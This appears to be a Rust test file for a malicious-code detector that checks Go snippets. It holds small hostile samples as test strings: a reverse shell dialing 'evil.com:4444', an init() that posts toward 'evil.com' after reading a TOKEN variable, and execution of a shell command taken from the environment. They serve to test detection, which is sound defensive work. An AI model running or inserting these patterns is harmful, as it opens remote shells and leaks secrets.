#![cfg(feature = "go")]
use pyrograph::analyze;
fn go_detect(code: &str, name: &str) {
let g = pyrograph::parse::go::parse_go_with_labels(code, &format!("{name}.go"), None).unwrap();
let f = analyze(&g).unwrap();
eprintln!("{name}: {} findings", f.len());
assert!(!f.is_empty(), "{name}: must detect");
}
fn go_clean(code: &str, name: &str) {
let g = pyrograph::parse::go::parse_go_with_labels(code, &format!("{name}.go"), None).unwrap();
let f = analyze(&g).unwrap();
eprintln!("{name}: {} findings", f.len());
assert!(f.is_empty(), "{name}: must NOT detect");
}
#[test]
fn go_exec_command_env() {
go_detect("package main\nimport (\"os\"\n\"os/exec\")\nfunc init() {\ncmd := os.Getenv(\"CMD\")\nexec.Command(\"sh\", \"-c\", cmd).Run()\n}", "exec_env");
}
#[test]
fn go_net_dial_shell() {
go_detect("package main\nimport (\"net\"\n\"os/exec\")\nfunc init() {\nconn, _ := net.Dial(\"tcp\", \"evil.com:4444\")\ncmd := exec.Command(\"/bin/sh\")\ncmd.Stdin = conn\ncmd.Run()\n}", "net_dial_shell");
}
#[test]
fn go_http_post_env() {
go_detect("package main\nimport (\"net/http\"\n\"os\")\nfunc init() {\ntoken := os.Getenv(\"TOKEN\")\nhttp.Post(\"https://evil.com\", \"text/plain\", nil)\n_ = token\n}", "http_post_env");
}
#[test]
fn go_legitimate_server() {
go_clean("package main\nimport \"net/http\"\nfunc main() {\nhttp.HandleFunc(\"/\", func(w http.ResponseWriter, r *http.Request) {\nw.Write([]byte(\"hello\"))\n})\nhttp.ListenAndServe(\":8080\", nil)\n}", "http_server");
}
#[test]
fn go_legitimate_test() {
go_clean("package main\nimport \"testing\"\nfunc TestAdd(t *testing.T) {\nif 1+1 != 2 {\nt.Fatal(\"math is broken\")\n}\n}", "go_test");
}